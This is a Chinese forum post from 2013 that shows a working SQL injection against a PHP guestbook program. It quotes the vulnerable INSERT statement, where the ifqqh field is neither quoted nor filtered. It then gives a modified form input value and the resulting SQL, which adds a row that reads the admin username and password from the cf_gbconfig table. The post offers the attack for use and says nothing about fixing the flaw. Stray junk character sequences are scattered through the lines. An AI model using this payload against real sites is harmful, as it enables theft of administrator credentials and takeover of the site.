留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
" f2 w+ T5 T( X0 k
. c* T! ~. Q) m1 w$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。# O7 b$ s; c3 F
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响& L1 f" |( i$ s6 @0 l# C
O0 t8 p' |' L$ d: L1 V
提交的时候把ifqqh的值改一下。变成
/ ?# g/ ~0 |8 d: J( n& Y! g- K, E
( V3 g' i, Q- d<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
4 V7 ]8 F, v4 R+ L1 y& U7 C) ~+ `5 t
这样SQL插入语句就变了.9 f3 `' T q- c% ]( q7 f/ t
0 T, m1 f6 @' |' Winsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0), [- `( m' }# u2 h5 @8 q' l% d
; `8 Z6 |. M9 ?& t0 T构造了另外一句SQL。并且把帐号密码读出来。0 L& k8 ~8 q" n! @+ o# Z: n) l
5 g/ [/ U. |, r8 |( e
|
发表于 2013-2-19 08:10:11
收藏
支持
反对